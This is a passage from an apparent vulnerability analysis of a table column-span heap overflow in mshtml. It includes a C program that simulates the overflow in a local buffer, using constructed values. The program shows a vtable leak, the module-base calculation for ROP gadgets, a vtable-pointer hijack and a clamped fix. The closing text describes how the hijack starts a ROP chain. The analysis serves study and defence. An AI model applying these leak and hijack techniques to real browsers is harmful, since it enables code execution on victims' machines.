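 * The column array was sized when span was 6; the loop later trusts the
 * *current* span value, so raising span via script writes past the array. */

#define COL_SZ      8                       /* per-column record: min width, max width */
#define ALLOC_COLS  6                       /* records allocated while span was still 6 */
#define OFF_COLS    0
#define OFF_STRLEN  (ALLOC_COLS * COL_SZ)   /* 48: BSTR byte-length field of the next object */
#define OFF_STR     (OFF_STRLEN + 4)        /* 52: UTF-16 "AAAAAAAA" */
#define STR_BYTES   16
#define OFF_VTABLE  (OFF_STR + STR_BYTES)   /* 68: vtable pointer of the object after the string */
#define ARENA_SZ    256

/* Constructed constants, not real mshtml values. */
#define FAKE_VTABLE_VA   0x6bd1b2f0u   /* vtable address as it sits in the victim object */
#define FAKE_VTABLE_RVA  0x001ab2f0u   /* assumed offset of that vtable from the module base */
#define ATTACKER_TARGET  0x0c0c0c0cu   /* value the hijacked vtable pointer should take */

static void put32(uint8_t *p, uint32_t v) { memcpy(p, &v, 4); }
static uint32_t get32(const uint8_t *p) { uint32_t v; memcpy(&v, p, 4); return v; }

/* Contiguous layout: [6 column records][str_len][string chars][vtable ptr]. */
static void setup_arena(uint8_t *a) {
    memset(a, 0, ARENA_SZ);
    put32(a + OFF_STRLEN, STR_BYTES);
    for (int i = 0; i < STR_BYTES; i += 2) { a[OFF_STR + i] = 'A'; a[OFF_STR + i + 1] = 0; }
    put32(a + OFF_VTABLE, FAKE_VTABLE_VA);
}

/* Vulnerable loop: iteration count comes from the span value read now,
 * but only ALLOC_COLS records exist. Each record receives (width, width). */
static void vulnerable_min_max(uint8_t *a, uint32_t span, uint32_t width) {
    for (uint32_t i = 0; i < span; i++) {
        put32(a + OFF_COLS + i * COL_SZ, width);       /* min width */
        put32(a + OFF_COLS + i * COL_SZ + 4, width);   /* max width */
    }
}

/* Generic hardening (assumed, not the vendor patch): never write past the
 * records that were actually allocated for this table. */
static void patched_min_max(uint8_t *a, uint32_t span, uint32_t width) {
    if (span > ALLOC_COLS) span = ALLOC_COLS;
    vulnerable_min_max(a, span, width);
}

/* Reading the string back trusts its length field, so an inflated length
 * lets the reader see the dword that follows the real string: the vtable. */
static uint32_t read_leaked_vtable(const uint8_t *a) {
    uint32_t len = get32(a + OFF_STRLEN);
    if (len <= STR_BYTES) return 0;                /* nothing beyond the string is exposed */
    return get32(a + OFF_STR + STR_BYTES);         /* first dword past the string */
}

/* Stage 1: span 6 -> 7. Record #6 lands on str_len (min) and the first
 * string chars (max); width becomes the new, oversized BSTR length. */
uint32_t demo_stage1_leak(void) {
    uint8_t a[ARENA_SZ];
    setup_arena(a);
    vulnerable_min_max(a, 7, 0x7fff);
    return read_leaked_vtable(a);
}

/* Module base = leaked vtable address - its RVA; ROP gadgets are then base + offset. */
uint32_t demo_stage1_base(void) {
    return demo_stage1_leak() - FAKE_VTABLE_RVA;
}

/* Stage 2: span 9. Record #8 covers bytes 64..71; its max-width dword is
 * exactly the vtable pointer at offset 68, so width becomes the new vtable. */
uint32_t demo_stage2_hijack(void) {
    uint8_t a[ARENA_SZ];
    setup_arena(a);
    vulnerable_min_max(a, 9, ATTACKER_TARGET);
    return get32(a + OFF_VTABLE);
}

/* With the clamp, even the POC's span of 666 leaves the neighbours intact. */
int demo_patched(void) {
    uint8_t a[ARENA_SZ];
    setup_arena(a);
    patched_min_max(a, 666, ATTACKER_TARGET);
    return get32(a + OFF_STRLEN) == STR_BYTES && get32(a + OFF_VTABLE) == FAKE_VTABLE_VA;
}

int main(void) {
    printf("stage 1: leaked vtable 0x%08x -> module base 0x%08x\n",
           (unsigned)demo_stage1_leak(), (unsigned)demo_stage1_base());
    printf("stage 2: vtable pointer is now 0x%08x\n", (unsigned)demo_stage2_hijack());
    printf("patched loop keeps the layout intact: %d\n", demo_patched());
    return 0;
}
```

The model deliberately stops at the overwritten pointer: the crash above shows what happens next, the first virtual call made on the corrupted object fetches its function pointer through the attacker-controlled vtable, so every dword of the sprayed block that the hijacked pointer designates must be a valid gadget address for the ROP chain to start cleanly.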
This concludes the analysis of the vulnerability.
References
《漏洞战争》 (Vulnerability Warfare)
WinDbg vulnerability analysis and debugging (part 1): https://paper.seebug.org/179/